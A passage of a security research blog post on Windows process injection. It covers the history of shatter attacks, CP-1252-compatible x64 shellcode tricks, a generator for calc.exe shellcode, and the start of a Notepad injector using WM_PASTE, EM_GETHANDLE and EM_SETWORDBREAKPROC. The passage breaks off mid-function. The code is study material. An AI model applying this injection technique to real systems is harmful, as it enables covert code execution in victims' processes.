Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

  1. Introduction
  2. Edit Controls
  3. Writing CP-1252 Compatible Code
    1. Initialization
    2. Set RAX to 0
    3. Set RAX to 1
    4. Set RAX to -1
    5. Load and Store Data
    6. Two Byte Instructions
    7. Prefix Codes
  4. Generating Shellcode
  5. Injecting and Executing
  6. Demonstration
  7. Encoding Arbitrary Data
    1. Encoding
    2. Decoding
  8. Acknowledgements
  9. Further Research
  10. Scrapheap

1. Introduction

‘Shatter attacks’ use Window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a followup paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.

Without focusing on the design of Windows itself, Shatter attacks were possible for two reasons: No isolation between processes sharing the same interactive desktop, and for allowing code to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels to prevent a low-privileged process sending messages to a high-privileged process. Data Execution Prevention (DEP) , which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.

ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.

For this post, I’ve written a PoC that does the following:

  • Use the clipboard and WM_PASTE message to inject code into the notepad process.
  • Use the EM_GETHANDLE message and ReadProcessMemory to obtain the buffer address of our code.
  • Use VirtualProtectEx to change memory permissions from Read-Write to Read-Write-Execute.
  • Use the EM_SETWORDBREAKPROC and WM_LBUTTONDBLCLK to execute shellcode.

Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. It’s also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to unicode.

2. Edit Controls

Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.

To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:”s -u %1 %2 \”modexp\””. This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.

Figure 1. Searching memory for the string in Notepad.

To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.

    hw = FindWindow("Notepad", NULL);
    hw = FindWindowEx(hw, NULL, "Edit", NULL);
    emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0); 
    printf("EM Handle : %p\n", emh);

Figure 2. The memory pointer returned by EM_GETHANDLE

The handle points to the buffer allocated for input as you can see in Figure 3.

Figure 3. Buffer allocated for input.

Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is using Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() converting the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain characters in the ranges [0x80, 0x8C], [0x91, 0x9C] or 0x8E, 0x9E and 0x9F. These “bad characters” will be converted to double byte character encodings. For UTF-8, only bytes in range [0x00, 0x7F] can be used.

NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just ensure to avoid two consecutive null bytes that indicate string termination. e.g “\x00\x00”

3. Writing CP-1252 Compatible Code

If writing Ansi shellcode that will be converted to Unicode before execution, let’s start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.

3.1 Initialization

Throughout the code, you’ll see the following.

"\x00\x4d\x00"         /* add   byte [rbp], cl */

Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Using BP requires three bytes and can be used almost right away.

Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems won’t cause an exception. However, the same cannot be said for 64-Bit, which depending on the compiler normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction between 1-5 bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that we’re not overwriting anything on the stack address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.

    ; ************************* prolog
    mov    al, 0
    enter  256, 0
    
    ; save rbp
    push   rbp
    add    [rbp], al
    
    ; create local variable for rbp
    push   0
    push   rsp
    add    [rbp], al
    
    pop    rbp
    add    [rbp], cl

If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.

EDITWORDBREAKPROCA EDITWORDBREAKPROCA;

int EDITWORDBREAKPROCA(
  LPSTR lpch,
  int ichCurrent,
  int cch,
  int code
)
{...}

If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.

3.2 Set RAX to 0

PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.

"\x6a\x00"             /* push  0                   */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x2d\x00\xff\x00\xff" /* sub   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x35\x00\xff\x00\xff" /* xor   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.

"\xb8\x00\xfe\x00\xfe" /* mov   eax, 0xfe00fe00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x25\x00\x01\x00\x01" /* and   eax, 0x01000100      */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

3.3 Set RAX to 1

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"     /* push 0              */
"\x54"         /* push rsp            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\xff\x00"     /* inc  dword [rax]    */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"         /* push  0              */
"\x54"             /* push  rsp            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xc6\x00\x01"     /* mov   byte [eax], 1  */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */

3.4 Set RAX to -1

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.

"\x6a\x00"         /* push  0              */
"\x59"             /* pop   rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xe2\x00"         /* loop  $+2            */
"\x34\x00"         /* xor   al, 0          */
"\x51"             /* push  rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX.

"\x6a\x00"     /* push 0                    */
"\x54"         /* push rsp                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x58"         /* pop  rax                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\xff\x00"     /* inc  dword [rax]          */
"\x6b\x00\xff" /* imul eax, dword [rax], -1 */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x59"         /* pop  rcx                  */

3.5 Load and Store Data

Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some aproaches.

Let’s take for example setting EAX to 0x12345678.

"\xb8\x78\x56\x34\x12" /* mov   eax, 0x12345678  */

This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off.

"\x6a\x00"                 /* push 0                          */
"\x54"                     /* push rsp                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\xff\x00"                 /* inc  dword [rax]                */
"\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x35\x00\x56\x00\x12"     /* xor  eax, 0x12005600            */

Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.

"\x6a\x00"                 /* push   0                      */
"\x54"                     /* push   rsp                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\xc7\x00\x78\x00\x34\x00" /* mov    dword [rax], 0x340078  */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x35\x00\x56\x00\x12"     /* xor    eax, 0x12005600        */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */

Another way using Rotate Left (ROL).

"\x68\x00\x78\x00\x34" /* push  0x34007800        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x18"         /* rol   dword [rax], 0x18 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x35\x00\x56\x00\x12" /* xor   eax, 0x12005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

Another example using MOV and ROL.

"\x68\x00\x56\x00\x12" /* push  0x12005600        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x78"         /* mov   byte [rax], 0x78  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc6\x00\x34"         /* mov   byte [rax], 0x34  */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xc1\x00\x10"         /* rol   dword [rax], 0x10 */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

Final example uses MOV, ADD, SCASB with the address of buffer stored in RDI.

"\x6a\x00"             /* push  0                 */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x5f"                 /* pop   rdi               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb8\x00\x12\x00\xff" /* mov   eax, 0xff001200   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xbb\x00\x34\x00\xff" /* mov   ebx, 0xff003400   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xb9\x00\x56\x00\xff" /* mov   ecx, 0xff005600   */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xba\x00\x78\x00\xff" /* mov   edx, 0xff007800   */
"\x00\x27"             /* add   byte [rdi], ah    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x3f"             /* add   byte [rdi], bh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x2f"             /* add   byte [rdi], ch    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\xae"                 /* scasb                   */
"\x00\x37"             /* add   byte [rdi], dh    */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */

3.6 Two Byte Instructions

If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.

    ; logic
    or al, 0
    
    xor al, 0
    
    and al, 0
    
    ; arithmetic
    add al, 0
    
    adc al, 0
    
    sbb al, 0
    
    sub al, 0
    
    ; comparison predicates
    cmp al, 0
    
    test al, 0
    
    ; data transfer
    mov al, 0
    mov ah, 0
    
    mov bl, 0
    mov bh, 0
    
    mov cl, 0
    mov ch, 0
    
    mov dl, 0
    mov dh, 0
    
    ; branches
    jmp $+2
    
    jo $+2
    jno $+2
  
    jb $+2
    jae $+2
    
    je $+2
    jne $+2
    
    jbe $+2
    ja $+2
    
    js $+2
    jns $+2
    
    jp $+2
    jnp $+2
    
    jl $+2
    jge $+2
    
    jle $+2
    jg $+2

    jrcxz $+2
    
    loop $+2
    
    loope $+2
    
    loopne $+2

3.7 Prefix Codes

Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.

Prefix Description
0x2E, 0x3E Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions.
0xF0 The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution.
0xF2, 0xF3 REP(0xF2) tells the CPU to repeat execution of a string manipulation instruction like MOVS, STOS, CMPS or SCAS until RCX is zero. REPNE (0xF3) repeats execution until RCX is zero or the Zero Flag (ZF) is cleared.
0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux.
0x66, 0x67 Used to override the default size of a data type in 32-bit mode for a PUSH/POP or MOV. NASM/YASM support operand-size (0x66) and operand-address (0x67) prefixes using a16, a32, o16 and o32.
0x40 – 0x4F REX prefixes for 64-Bit mode.

4. Generating Shellcode

Some things to consider when writing your own.

  • Preserve all non-volatile registers used. RSI, RDI, RBP, RBX
  • Allocate 32 bytes for homespace. This will be used by any API you invoke.
  • Before invoking API, ensure the value of SP is aligned by 16 bytes minus 8.

Some API will use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead and once executed removes an API address from the stack. If it’s not aligned by 16 bytes at that point, expect trouble! 🙂

Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate the injection via notepads edit control works.

// the max address for virtual memory on 
// windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF
#define MAX_ADDR 6

// only useful for CP_ACP codepage
static
int is_cp1252_allowed(int ch) {
  
    // zero is allowed, but we can't use it for the clipboard
    if(ch == 0) return 0;
    
    // bytes converted to double byte characters
    if(ch >= 0x80 && ch <= 0x8C) return 0;
    if(ch >= 0x91 && ch <= 0x9C) return 0;
    
    return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
}

// Allocate 64-bit buffer on the stack.
// Then place the address in RDI for writing.
#define STORE_ADDR_SIZE 10

char STORE_ADDR[] = {
  /* 0000 */ "\x6a\x00"             /* push 0                */
  /* 0002 */ "\x54"                 /* push rsp              */
  /* 0003 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
  /* 0006 */ "\x5f"                 /* pop  rdi              */
  /* 0007 */ "\x00\x5d\x00"         /* add  byte [rbp], cl   */
};

// Load an 8-Bit immediate value into AH
#define LOAD_BYTE_SIZE 5

char LOAD_BYTE[] = {
  /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov   eax, 0x4d00ff00 */
};

// Subtract 32 from AH
#define SUB_BYTE_SIZE 8

char SUB_BYTE[] = {
  /* 0000 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
  /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub   eax, 0x4d002000 */
};

// Store AH in buffer and advance RDI by 1
#define STORE_BYTE_SIZE 9

char STORE_BYTE[] = {
  /* 0000 */ "\x00\x27"             /* add   byte [rdi], ah  */
  /* 0002 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
  /* 0005 */ "\xae"                 /* scasb                 */
  /* 0006 */ "\x00\x5d\x00"         /* add   byte [rbp], cl  */
};

// Transfers control of execution to kernel32!WinExec
#define RET_SIZE 2

char RET[] = {
  /* 0000 */ "\xc3" /* ret  */
  /* 0002 */ "\x00"
};

#define CALC3_SIZE 164
#define RET_OFS 0x20 + 2

char CALC3[] = {
  /* 0000 */ "\xb0\x00"                 /* mov   al, 0                 */
  /* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0              */
  /* 0006 */ "\x55"                     /* push  rbp                   */
  /* 0007 */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 000A */ "\x6a\x00"                 /* push  0                     */
  /* 000C */ "\x54"                     /* push  rsp                   */
  /* 000D */ "\x00\x45\x00"             /* add   byte [rbp], al        */
  /* 0010 */ "\x5d"                     /* pop   rbp                   */
  /* 0011 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0014 */ "\x57"                     /* push  rdi                   */
  /* 0015 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0018 */ "\x56"                     /* push  rsi                   */
  /* 0019 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 001C */ "\x53"                     /* push  rbx                   */
  /* 001D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov   eax, 0xff004d00       */
  /* 0025 */ "\x00\xe1"                 /* add   cl, ah                */
  /* 0027 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 002A */ "\xb8\x00\x01\x00\xff"     /* mov   eax, 0xff000100       */
  /* 002F */ "\x00\xe5"                 /* add   ch, ah                */
  /* 0031 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0034 */ "\x51"                     /* push  rcx                   */
  /* 0035 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0038 */ "\x5b"                     /* pop   rbx                   */
  /* 0039 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 003C */ "\x6a\x00"                 /* push  0                     */
  /* 003E */ "\x54"                     /* push  rsp                   */
  /* 003F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0042 */ "\x5f"                     /* pop   rdi                   */
  /* 0043 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0046 */ "\x57"                     /* push  rdi                   */
  /* 0047 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004A */ "\x59"                     /* pop   rcx                   */
  /* 004B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 004E */ "\x6a\x00"                 /* push  0                     */
  /* 0050 */ "\x54"                     /* push  rsp                   */
  /* 0051 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0054 */ "\x58"                     /* pop   rax                   */
  /* 0055 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov   dword [rax], 0x6c0063 */
  /* 005E */ "\x58"                     /* pop   rax                   */
  /* 005F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0062 */ "\x35\x00\x61\x00\x63"     /* xor   eax, 0x63006100       */
  /* 0067 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006A */ "\xab"                     /* stosd                       */
  /* 006B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 006E */ "\x6a\x00"                 /* push  0                     */
  /* 0070 */ "\x54"                     /* push  rsp                   */
  /* 0071 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0074 */ "\x58"                     /* pop   rax                   */
  /* 0075 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0078 */ "\xc6\x00\x05"             /* mov   byte [rax], 5         */
  /* 007B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 007E */ "\x5a"                     /* pop   rdx                   */
  /* 007F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0082 */ "\x53"                     /* push  rbx                   */
  /* 0083 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0086 */ "\x6a\x00"                 /* push  0                     */
  /* 0088 */ "\x6a\x00"                 /* push  0                     */
  /* 008A */ "\x6a\x00"                 /* push  0                     */
  /* 008C */ "\x6a\x00"                 /* push  0                     */
  /* 008E */ "\x6a\x00"                 /* push  0                     */
  /* 0090 */ "\x53"                     /* push  rbx                   */
  /* 0091 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0094 */ "\x90"                     /* nop                         */
  /* 0095 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 0098 */ "\x90"                     /* nop                         */
  /* 0099 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 009C */ "\x90"                     /* nop                         */
  /* 009D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
  /* 00A0 */ "\x90"                     /* nop                         */
  /* 00A1 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
};

#define CALC4_SIZE 79
#define RET_OFS2 0x18 + 2

char CALC4[] = {
  /* 0000 */ "\x59"                 /* pop  rcx              */
  /* 0001 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0004 */ "\x59"                 /* pop  rcx              */
  /* 0005 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0008 */ "\x59"                 /* pop  rcx              */
  /* 0009 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 000C */ "\x59"                 /* pop  rcx              */
  /* 000D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0010 */ "\x59"                 /* pop  rcx              */
  /* 0011 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0014 */ "\x59"                 /* pop  rcx              */
  /* 0015 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov  eax, 0xff004d00  */
  /* 001D */ "\x00\xe1"             /* add  cl, ah           */
  /* 001F */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0022 */ "\x51"                 /* push rcx              */
  /* 0023 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0026 */ "\x58"                 /* pop  rax              */
  /* 0027 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 002A */ "\xc6\x00\xc3"         /* mov  byte [rax], 0xc3 */
  /* 002D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0030 */ "\x59"                 /* pop  rcx              */
  /* 0031 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0034 */ "\x5b"                 /* pop  rbx              */
  /* 0035 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0038 */ "\x5e"                 /* pop  rsi              */
  /* 0039 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 003C */ "\x5f"                 /* pop  rdi              */
  /* 003D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0040 */ "\x59"                 /* pop  rcx              */
  /* 0041 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 0044 */ "\x6a\x00"             /* push 0                */
  /* 0046 */ "\x58"                 /* pop  rax              */
  /* 0047 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004A */ "\x5c"                 /* pop  rsp              */
  /* 004B */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
  /* 004E */ "\x5d"                 /* pop  rbp              */
};


static
u8* cp1252_generate_winexec(int pid, int *cslen) {
    int     i, ofs, outlen;
    u8      *cs, *out;
    HMODULE m;
    w64_t   addr;
    
    // it won't exceed 512 bytes
    out = (u8*)cs = VirtualAlloc(
      NULL, 4096, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
    
    // initialize parameters for WinExec()
    memcpy(out, CALC3, CALC3_SIZE);
    out += CALC3_SIZE;

    // initialize RDI for writing
    memcpy(out, STORE_ADDR, STORE_ADDR_SIZE);
    out += STORE_ADDR_SIZE;

    // ***********************************
    // store kernel32!WinExec on stack
    m = GetModuleHandle("kernel32");
    addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m);
    m = GetProcessModuleHandle(pid, "kernel32.dll");
    addr.q += (ULONG_PTR)m;
    
    for(i=0; i<MAX_ADDR; i++) {      
      // load a byte into AH
      memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE);
      out[2] = addr.b[i];
    
      // if byte not allowed for CP1252, add 32
      if(!is_cp1252_allowed(out[2])) {
        out[2] += 32;
        // subtract 32 from byte at runtime
        memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE);
        out += SUB_BYTE_SIZE;
      }
      out += LOAD_BYTE_SIZE;
      // store AH in [RDI], increment RDI
      memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
      out += STORE_BYTE_SIZE;
    }
    
    // calculate length of constructed code
    ofs = (int)(out - (u8*)cs) + 2;
    
    // first offset
    cs[RET_OFS] = (uint8_t)ofs;
    
    memcpy(out, RET, RET_SIZE);
    out += RET_SIZE;
    
    memcpy(out, CALC4, CALC4_SIZE);
    
    // second offset
    ofs = CALC4_SIZE;
    ((u8*)out)[RET_OFS2] = (uint8_t)ofs;
    out += CALC4_SIZE;
    
    outlen = ((int)(out - (u8*)cs) + 1) & -2;

    // convert to ascii
    for(i=0; i<=outlen; i+=2) {
      cs[i/2] = cs[i];
    }

    *cslen = outlen / 2;
    // return pointer to code
    return cs;
}

5. Injecting and Executing Shellcode

The following steps are used.

  1. Execute notepad.exe and obtain a window handle for the edit control.
  2. Get the edit control handle using the EM_GETHANDLE message.
  3. Generate text equivalent to, or greater than the size of the shellcode and copy it to the clipboard.
  4. Assign a NULL pointer to lastbuf
  5. Read the address of input buffer from the EM handle and assign to embuf.
  6. If lastbuf and embuf are equal. Goto step 9.
  7. Clear the memory buffer using WM_SETSEL and WM_CLEAR.
  8. Send the WM_PASTE message to the edit control window handle. Wait 1 second, then goto step 5.
  9. Set embuf to PAGE_EXECUTE_READWRITE.
  10. Generate CP-1252 compatible shellcode and copy to the clipboard.
  11. Set the edit control word break function to embuf using EM_SETWORDBREAKPROC
  12. Trigger execution of shellcode using WM_LBUTTONDBLCLK
BOOL em_inject(void) {
    HWND   npw, ecw;
    w64_t  emh, lastbuf, embuf;
    SIZE_T rd;
    HANDLE hp;
    DWORD  cslen, pid, old;
    BOOL   r;
    PBYTE  cs;
    
    char   buf[1024];
    
    // get window handle for notepad class
    npw = FindWindow("Notepad", NULL);
    
    // get window handle for edit control
    ecw = FindWindowEx(npw, NULL, "Edit", NULL);
    
    // get the EM handle for the edit control
